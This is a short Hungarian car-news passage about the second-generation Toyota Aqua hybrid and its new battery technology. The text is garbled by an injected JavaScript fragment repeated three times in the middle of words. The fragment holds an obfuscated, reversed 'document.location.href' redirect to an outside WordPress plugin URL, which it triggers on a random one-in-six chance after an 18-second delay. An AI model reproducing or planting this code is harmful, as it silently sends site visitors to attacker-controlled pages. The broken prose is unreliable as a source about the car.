Soha nem volt sok értelme a Toyota Aqua kisautónak, hiszen csak annyiban tudott többet a Toyota Yarisnál, hogy az Aquából eleve csak hibrid verzió létezett, ezért vásárlói ugyanúgy hirdethették környezetbarát szemléletüket, mint a Prius-ügyfelek. Ennek ellenére Japánban a forgalmazása tíz évéből hármat az abszolút eladási ranglista élén töltött, így amikor ideje volt nyugdíjazni, fel sem merült, hogy utód nélkül vonuljon vissza. Most bemutatkozott a második generációs Aqua, amely hosszabb, nehezebb és tágasabb a Yarisnál, de nem is ez a legfontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabb ismérve, hanem hogy különleges akkumulátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor-technológiát vezet be a piacra. A hagyományos nikkel-hidrogén akkumulátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torok esetében az elektrolitban úszó anód és a…
- Hirdetés -